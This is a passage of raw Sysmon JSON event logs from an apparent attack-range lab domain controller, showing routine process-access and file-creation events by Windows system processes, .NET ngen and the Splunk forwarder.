C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2291-5F25-0000-0010FF860F00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2291-5F25-0000-0010FF860F00}","TargetProcessId":"4116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.537\r\nSourceProcessGUID: {41C8662E-2291-5F25-0000-0010FF860F00}\r\nSourceProcessId: 4116\r\nSourceThreadId: 3816\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.537","SourceProcessGUID":"{41C8662E-2291-5F25-0000-0010FF860F00}","SourceProcessId":"4116","SourceThreadId":"3816","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:41.819\r\nProcessGuid: {41C8662E-2290-5F25-0000-001053820F00}\r\nProcessId: 5028\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13a4-0\\System.Printing.dll\r\nCreationUtcTime: 2020-08-01 08:06:41.819","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:41.819","ProcessGuid":"{41C8662E-2290-5F25-0000-001053820F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13a4-0\\System.Printing.dll","CreationUtcTime":"2020-08-01 08:06:41.819","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.865\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-001087CC0E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.865","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-001087CC0E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.865\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-001087CC0E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.865","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-001087CC0E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.865\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-001087CC0E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.865","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-001087CC0E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventRece